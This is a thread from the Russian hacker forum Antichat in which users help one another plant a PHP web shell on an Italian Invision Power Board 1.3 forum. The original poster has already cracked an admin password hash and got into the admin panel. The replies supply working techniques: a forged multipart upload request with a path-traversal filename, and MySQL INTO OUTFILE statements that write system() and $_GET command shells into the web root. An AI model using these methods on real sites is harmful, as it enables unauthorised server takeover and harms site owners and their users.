ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос о заливке шелла на форуме Powered by Invision Power Board(U) v1.3 Final
  #1  
Старый 06.01.2006, 16:18
Аватар для 0verfe1
0verfe1
Новичок
Регистрация: 28.08.2005
Сообщений: 27
Провел на форуме:
63939

Репутация: -4
По умолчанию Вопрос о заливке шелла на форуме Powered by Invision Power Board(U) v1.3 Final

Powered by Invision Power Board(U) v1.3 Final
короче получил хеш,расшифровал,захожу в админку,в смайлики пытаюсь закачать шелл пишет :
Upload Fallito!
пытался настраивать разрешенные типы файлов( разрешал *.phtml) и всё равно не пашет,может на форуме были подобные темы,но просьба мне дать нормальное объяснение как закачать шелл в таких обстоятельствах =)
плизз
 
Ответить с цитированием

  #2  
Старый 06.01.2006, 16:35
Аватар для FQziT
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию

Хех, ну скорее всего он пишет Upload Failed, а не то, что написал ты...
Если залить шелл в папку со смайликами не удаётся (папка закрыта на запись), то тогда попробуй через подделку HTTP запросов залить в папку uploads. Как это сделать читай тут: http://antichat.ru/txt/IPB/index2.php
ЗЫ: И таких тем полно по форуму! Не ленись пользоваться поиском! Вот к примеру: http://forum.antichat.ru/thread11725.html
 
Ответить с цитированием

  #3  
Старый 06.01.2006, 17:42
Аватар для 0verfe1
0verfe1
Новичок
Регистрация: 28.08.2005
Сообщений: 27
Провел на форуме:
63939

Репутация: -4
По умолчанию

Цитата:
Хех, ну скорее всего он пишет Upload Failed, а не то, что написал ты...
как раз Upload Fallito!,форум итальянский..
Цитата:
то тогда попробуй через подделку HTTP запросов залить в папку uploads. Как это сделать читай тут: http://antichat.ru/txt/IPB/index2.php
я это видел раньше,но всё как-то там замудренно,я думаю ща придётся разбиратся
 
Ответить с цитированием

  #4  
Старый 06.01.2006, 17:52
Аватар для FQziT
FQziT
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982

Репутация: 523


По умолчанию

Цитата:
Сообщение от 0verfe1  
я это видел раньше,но всё как-то там замудренно,я думаю ща придётся разбиратся
"Замудренно"? Там всё так расписано, что не суметь повторить этого я думаю очень сложно. Статья написана очень подробно и понятно имхо.

Последний раз редактировалось FQziT; 06.01.2006 в 17:56..
 
Ответить с цитированием

  #5  
Старый 06.01.2006, 18:19
Аватар для 0verfe1
0verfe1
Новичок
Регистрация: 28.08.2005
Сообщений: 27
Провел на форуме:
63939

Репутация: -4
По умолчанию

Цитата:
POST http://someSiteForum/admin.php?adses...1f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adses...ct=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--
вот мне только не понятно 7d43942c405bc что это за значение ? и откуда я его могу взять ? без него отправить получилось но скрипта на месте не оказалось..
 
Ответить с цитированием

  #6  
Старый 06.01.2006, 18:43
Аватар для rent0n
rent0n
Участник форума
Регистрация: 25.12.2005
Сообщений: 146
Провел на форуме:
123219

Репутация: 36
По умолчанию

Попробуй залить через mysql. Где-то на рстшном форуме была статейка, ну примерно вот так:
create table ibf_shell(myshell char(50));
Insert into ibf_shell(myshell) values('<?тут пишешь php-команды, типа system("id")?>');
Select myshell from ibf_shell into outfile 'тут полный путь к файлу, типа /home/qwerty/www/uploads/cmd.php';
Если прав на аутфайл хватит, то считай что тебе повезло. Кроме того, ели включены register_globals, то можешь ввести что-то типа этого system($_GET)(вроде так). НО!
Я юзал так несколько форумов, и прав на вывод в outfile у меня не хватало, т.е. было
permission denied for user admin@localhost .
Если помог - ткни на репутацию...
 
Ответить с цитированием

  #7  
Старый 06.01.2006, 21:54
Аватар для m0nzt3r
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

да ты прав такой способ катит...еще один вариант создаешь темку с названием
<? $_GET[cmd]; ?>
потом с тем же outfile-ом выводишь эти строки в файл, просто надо тада запомнить столбец в котором нах-ся названия тем(я в мускуле не силен надеюсь прально сказал=)))
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #8  
Старый 07.01.2006, 03:23
Аватар для rent0n
rent0n
Участник форума
Регистрация: 25.12.2005
Сообщений: 146
Провел на форуме:
123219

Репутация: 36
По умолчанию

Повторюсь, если админ не полный кретин, то прав на вывод в outfile не хватит
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос. dukalis(AwP) Форумы 14 19.04.2006 19:40
Вопросы по форуму Invision Power Board(U) v1.3 Final © 2003(р) FRTD Форумы 50 02.04.2005 02:48
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final rsha1988 Форумы 12 15.02.2005 01:44
Вопрос про уязвимости в Invision Power Board(U) v1.3 Final Майор Форумы 15 14.01.2005 14:20



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ